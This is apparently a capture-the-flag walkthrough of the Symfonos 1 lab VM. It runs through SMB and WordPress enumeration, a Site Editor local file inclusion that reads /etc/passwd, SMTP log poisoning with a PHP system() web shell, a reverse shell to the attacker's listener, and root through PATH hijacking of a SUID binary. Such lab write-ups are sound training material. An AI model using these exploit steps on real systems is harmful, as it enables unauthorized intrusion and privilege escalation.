Symfonos 1
First step port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon symfonos.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
Hey I was thinking about this part of the code...oh wait, pull request is already done RiJaba1
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 12:41 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Initiating ARP Ping Scan at 12:41
Scanning symfonos.vuln (10.0.2.7) [1 port]
Completed ARP Ping Scan at 12:41, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:41
Scanning symfonos.vuln (10.0.2.7) [65535 ports]
Discovered open port 445/tcp on 10.0.2.7
Discovered open port 139/tcp on 10.0.2.7
Discovered open port 25/tcp on 10.0.2.7
Discovered open port 22/tcp on 10.0.2.7
Discovered open port 80/tcp on 10.0.2.7
Completed SYN Stealth Scan at 12:41, 1.26s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.7.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Nmap scan report for symfonos.vuln (10.0.2.7)
Host is up (0.000062s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:2A:FD:57 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 12:41
Completed NSE at 12:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[+] [smb]
SMB symfonos.vuln 445 SYMFONOS [*] Windows 6.1 (name:SYMFONOS) (domain:) (signing:False) (SMBv1:True)
[+] Guest session IP: symfonos.vuln:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
helios NO ACCESS Helios personal share
anonymous READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.5.16-Debian)
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
helios Disk Helios personal share
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SYMFONOS
[~] [smb knocker]
[print$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[helios]
tree connect failed: NT_STATUS_ACCESS_DENIED
[anonymous]
Current directory is \\symfonos.vuln\anonymous\
. D 0 Fri Jun 28 21:14:49 2019
.. D 0 Fri Jun 28 21:12:15 2019
attention.txt N 154 Fri Jun 28 21:14:49 2019
19994224 blocks of size 1024. 17249836 blocks available
[IPC$]
Current directory is \\symfonos.vuln\IPC$\
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[+] [fuzzin server]
http://symfonos.vuln [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.0.2.7]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jul 12 12:41:32 2022
URL_BASE: http://symfonos.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://symfonos.vuln:80/ ----
+ http://symfonos.vuln:80/index.html (CODE:200|SIZE:328)
==> DIRECTORY: http://symfonos.vuln:80/manual/
+ http://symfonos.vuln:80/server-status (CODE:403|SIZE:301)
-----------------
END_TIME: Tue Jul 12 12:41:33 2022
DOWNLOADED: 4612 - FOUND: 2
recon reports five tcp ports open 22 for ssh, 25 for smtp, 80 for http, 135 and 445 for smb. Additionally recon drops useful smb information using tools as smbmap or smbclient. We can see a few server info but we are not focused on the server yet, let's gain some smb information
┌──(root@ghost)-[/home/ghost]
└─# smbclient -N \\\\symfonos.vuln\\anonymous
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jun 28 21:14:49 2019
.. D 0 Fri Jun 28 21:12:15 2019
attention.txt N 154 Fri Jun 28 21:14:49 2019
19994224 blocks of size 1024. 17249248 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50.1 KiloBytes/sec) (average 50.1 KiloBytes/sec)
smb: \> exit
┌──(root@ghost)-[/home/ghost]
└─# cat attention.txt
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
Humm somebody is mad because someone is using weak or reused passwords, totally agree with that, let's see if user helios is involved in this madness
┌──(root@ghost)-[/home/ghost]
└─# smbclient \\\\symfonos.vuln\\helios -U helios
Enter WORKGROUP\helios's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jun 28 20:32:05 2019
.. D 0 Fri Jun 28 20:37:04 2019
research.txt A 432 Fri Jun 28 20:32:05 2019
todo.txt A 52 Fri Jun 28 20:32:05 2019
19994224 blocks of size 1024. 17249244 blocks available
smb: \> get research.txt
getting file \research.txt of size 432 as research.txt (140.6 KiloBytes/sec) (average 140.6 KiloBytes/sec)
smb: \> get todo.txt
getting file \todo.txt of size 52 as todo.txt (12.7 KiloBytes/sec) (average 67.5 KiloBytes/sec)
smb: \> exit
helios user is using qwerty password for smb
┌──(root@ghost)-[/home/ghost]
└─# cat todo.txt
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
Dev seems working on /h3l105 path, after get in http://symfonos.vuln/h3l105/ we found that some resources are pointing to symfonos.local so we add it to /etc/hosts, now website looks as should be. Once again we need information about the news
┌──(root@ghost)-[/home/ghost]
└─# whatweb "http://symfonos.local/h3l105/"
http://symfonos.local/h3l105/ [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.0.2.7], JQuery, MetaGenerator[WordPress 5.2.2], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[helios site – Just another WordPress site], UncommonHeaders[link], WordPress[5.2.2]
We are pointing to a wordpress site now, keep it in mind
┌──(root@ghost)-[/home/ghost]
└─# wpscan -e u,p --url "http://symfonos.local/h3l105/"
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.20
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://symfonos.local/h3l105/ [10.0.2.7]
[+] Started: Tue Jul 12 13:18:09 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://symfonos.local/h3l105/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://symfonos.local/h3l105/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://symfonos.local/h3l105/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://symfonos.local/h3l105/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://symfonos.local/h3l105/index.php/feed/, https://wordpress.org/?v=5.2.2
| - http://symfonos.local/h3l105/index.php/comments/feed/, https://wordpress.org/?v=5.2.2
[+] WordPress theme in use: twentynineteen
| Location: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://symfonos.local/h3l105/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=====================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Jul 12 13:18:11 2022
[+] Requests Done: 53
[+] Cached Requests: 6
[+] Data Sent: 14.929 KB
[+] Data Received: 521.126 KB
[+] Memory used: 173.656 MB
[+] Elapsed time: 00:00:01
User admin found and more folders. If we navigate to http://symfonos.vuln/h3l105/wp-content/uploads/ we we'll see siteeditor folder
┌──(root@ghost)-[/home/ghost]
└─# searchsploit wordpress site editor
searchsploit wordpress site editor
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php/webapps/44340.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/php/webapps/44340.txt
** Proof of Concept **
http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
If you have wpscan token you will see a Mail Masta 1.0 plugin report, this is a workaround that I'm not covering here
┌──(root@ghost)-[/home/ghost]
└─# searchsploit 'WordPress Plugin Mail Masta 1.0 - Local File Inclusion'
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/php/webapps/40290.txt
...
Typical proof-of-concept would be to load passwd file:
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
Back to Site Editor
┌──(root@ghost)-[/home/ghost]
└─# curl "http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
{"success":true,"data":{"output":[]}}
After a hard enumeration, knowing smtp port is open, we proceed to curl "http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios" and we get /var/mail/helios output, let's try if we have write permissions by log poisoning
As this injection requires specific params I'll proceed to make the injection manually, later I will use lfi2rce slightly modifying the smtp variable in the source code smtp_file_to_poison='/var/mail/helios' to get an auto reverse shell┌──(root@ghost)-[/home/ghost]
└─# telnet symfonos.local 25
Trying 10.0.2.8...
Connected to symfonos.local.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM:<unknow>
250 2.1.0 Ok
RCPT TO:helios
250 2.1.5 Ok
data
354 End data with .
<?php system($_GET['cmd']); ?>
.
250 2.0.0 Ok: queued as 5A44D406A1
quit
221 2.0.0 Bye
Connection closed by foreign host.
┌──(root@ghost)-[/home/ghost]
└─# lfi2rce.py "http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=" smtp 10.0.2.6 1337
lfi2rce ~by 0bfxgh0st*
Poison /var/mail/helios
[+] Sending payload
listening on [any] 1337 ...
connect to [10.0.2.6] from symfonos.local [10.0.2.8] 34822
bash: cannot set terminal process group (470): Inappropriate ioctl for device
bash: no job control in this shell
<ite-editor/editor/extensions/pagebuilder/includes$ whoami
whoami
helios
<ite-editor/editor/extensions/pagebuilder/includes$
And connected, time to elevate our privileges
helios@symfonos:/home/helios/share$ find / -type f -perm /6000 2>/dev/null
find / -type f -perm /6000 2>/dev/null
/sbin/unix_chkpwd
/usr/sbin/postdrop
/usr/sbin/postqueue
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/expiry
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/bsd-write
/usr/bin/wall
/usr/bin/ssh-agent
/usr/bin/chfn
/usr/bin/dotlockfile
/usr/bin/crontab
/usr/bin/dotlock.mailutils
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
We are looking for suid programs and we found something relevant in /opt/statuscheck, let's check what's inside the binary
helios@symfonos:/opt$ strings statuscheck
strings statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
As we can see statuscheck is invoking curl command, there is a way to escalate privileges from this by path hijacking
helios@symfonos:/opt$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl
chmod 777 curl
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
whoami
root
cd /root
ls -la
total 24
drwx------ 2 root root 4096 Jun 28 2019 .
drwxr-xr-x 22 root root 4096 Jun 28 2019 ..
lrwxrwxrwx 1 root root 9 Jun 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Jun 28 2019 .selected_editor
-rw-r--r-- 1 root root 1735 Jun 28 2019 proof.txt
cat proof.txt
Congrats on rooting symfonos:1!
\ __
--==/////////////[})))==*
/ \ ' ,|
`\`\ //| ,|
\ `\ //,/' -~ |
) _-~~~\ |/ / |'| _-~ / ,
(( /' ) | \ / /'/ _-~ _/_-~|
((( ; /` ' )/ /'' _ -~ _-~ ,/'
) )) `~~\ `\\/'/|' __--~~__--\ _-~ _/,
((( )) / ~~ \ /~ __--~~ --~~ __/~ _-~ /
((\~\ | ) | ' / __--~~ \-~~ _-~
`\(\ __--( _/ |'\ / --~~ __--~' _-~ ~|
( ((~~ __-~ \~\ / ___---~~ ~~\~~__--~
~~\~~~~~~ `\-~ \~\ / __--~~~'~~/
;\ __.-~ ~-/ ~~~~~__\__---~~ _..--._
;;;;;;;;' / ---~~~/_.-----.-~ _.._ ~\
;;;;;;;' / ----~~/ `\,~ `\ \
;;;;' ( ---~~/ `:::| `\\.
|' _ `----~~~~' / `:| ()))),
______/\/~ | / / (((((())
/~;;.____/;;' / ___.---( `;;;/ )))'`))
/ // _;______;'------~~~~~ |;;/\ / (( (
// \ \ / | \;;,\ `
(<_ \ \ /',/-----' _>
\_| \\_ //~;~~~~~~~~~
\_| (,~~
\~\
~~
Contact me via Twitter @zayotic to give feedback!